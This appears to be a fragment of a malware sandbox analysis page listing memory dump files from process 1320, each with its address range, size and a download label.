memory/1320-4-0x000007FEF5ACE000-0x000007FEF5ACF000-memory.dmp

Filesize
4KB

Download
memory/1320-5-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/1320-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1320-7-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1320-8-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1320-9-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1320-11-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download
memory/1320-28-0x000007FEF5ACE000-0x000007FEF5ACF000-memory.dmp

Filesize
4KB

Download
memory/1320-29-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing